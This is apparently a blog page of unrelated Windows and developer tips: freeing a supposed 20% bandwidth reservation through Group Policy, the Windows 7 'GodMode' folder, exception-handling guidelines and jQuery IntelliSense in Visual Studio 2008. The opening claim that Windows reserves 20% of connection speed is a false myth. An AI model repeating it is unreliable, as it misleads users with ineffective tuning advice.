It is possible to gain an extra 20% of bandwidth out of your internet connection. By default Windows XP, Windows Vista and also Windows 7 reserve 20% of your Internet speed for use by services like windows update and other programs that require frequent internet access. This limit is configurable from Group policy Object Editor. When we set this value to 0, the reserved 20% will be added to your browsing and download speed. Below are the configuration steps:

  1. Start -> Run -> GPEdit.msc
  2. Expand the Administrative Templates under Computer Configuration
  3. Expand the Network tab
  4. Select QoS Packet Scheduler
  5. Click on Limit Reservable Bandwidth
  6. Enable the check box
  7. Change the Bandwidth limit to 0%
  8. Start -> Run -> “gpupdate /force” Or restart your computer

Hacking Windows 7: The God Mode

Image representing Microsoft as depicted in Cr...

Image via CrunchBase

One of the secrets of Windows 7 that is undocumented by Microsoft is the secret option known as God Mode.

GodMode is simply a hidden control panel that contains everything about windows 7 configuration options and settings, all located in one place plus additional features that are not easily found in the ordinary Control Panel. Below is a picture of a small part of the options found in GodMode panel.

The trick to access the GodMode is simple, just follow these steps:

  • Create a new folder
  • Name the folder with the following name: GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  • Once created, you should see the folder icon changed to the control panel icon.

Give it a try and explore the powerful and useful hidden features in windows 7. I have not tested the GodMode on Windows Vista. Try it out and let us know about the results!

Exception Handling Guidelines

Forums and Minerals, the new Internet tools

Image via Wikipedia

Follow class naming conventions, but add Exception to the end of the name.
Some rules listed below are to be followed in Exceptions blocks or classes:

  1. Never do a “catch” exception and do nothing. If you hide an exception, you will never know if the exception happened or not.
  2. In case of exceptions, give a friendly message to the user, but log the actual error with all possible details about the error, including the time it occurred, method and class name etc.
  3. Always catch only the specific exception, not generic exception as well as system exceptions.
  4. You can have an application level (thread level) error handler where you can handle all general exceptions. In case of an ‘unexpected general error’, this error handler should catch the exception and should log the error in addition to
    giving a friendly message to the user before closing the application, or allowing the user to ‘ignore and proceed’.
  5. Do not write try-catch in all your methods. Use it only if there is a possibility that a specific exception may occur. For example, if you are writing into a file, handle only FileIOException.
  6. Do not write very large try-catch blocks. If required, write separate try-catch for each task you perform and enclose only the specific piece of code inside the try-catch. This will help you find which piece of code generated the exception and you can give specific error message to the user.
  7. You may write your own custom exception classes, if required in your application. Do not derive your custom exceptions from the base class SystemException. Instead, inherit from ApplicationException.
  8. To guarantee resources are cleaned up when an exception occurs, use a try/finally block. Close the resources in the finally clause. Using a try/finally block ensures that resources are disposed even if an exception occurs.
  9. Error messages should help the user to solve the problem. Never give error messages like “Error in Application”, “There is an error” etc. Instead give specific messages like “Failed to update database. Make sure the login id and password are correct.”
  10. When displaying error messages, in addition to telling what is wrong, the message should also tell what the user should do to solve the problem. Instead of message like “Failed to update database.” suggest what should the user do: “Failed to update database. Make sure the login id and password are correct.”
  11. Show short and friendly message to the user. But log the actual error with all possible information. This will help a lot in diagnosing problems.
  12. Define a global error handler in Global.asax to catch any exceptions that are not handled in code. You should log all exceptions in the event log to record them for tracking and later analysis.

Adding IntelliSense for JQuery in Visual Studio 2008

To set up IntelliSense for JQuery you will need to download the JQuery Documentation File
from the JQuery site.

At the top of the JavaScript file in which you would like to have jQuery IntelliSense enabled, you will need to add a line to reference
the documentation file:

                                        /// <reference path="jquery-1.3.2-vsdoc2.js" />

If you downloaded jQuery and saved it to your project Visual Studio will look for the vsdoc.js file automatically if
the following conditions are met.

  • You downloaded and installed the hotfix for Visual Studio.
  • jQuery and the documentation file need to be named the same with the exception that the documentation file end with -vsdoc.js.
    So when you add jQuery to your project make sure to rename them similarly. For instance, jquery-1.3.2.js is your jQuery library,
    Visual Studio will look for the documentation file at jquery-1.3.2-vsdoc.js and load it.

    (Note: the jQuery 1.3.2 documentation file is named jquery-1.3.2-vsdoc2.js on the Download page so make sure you take out
    the 2 so that the file will be found by Visual Studio).

  • To test to make sure the documentation file loaded correctly, you can type $( and you should be presented with some documentation.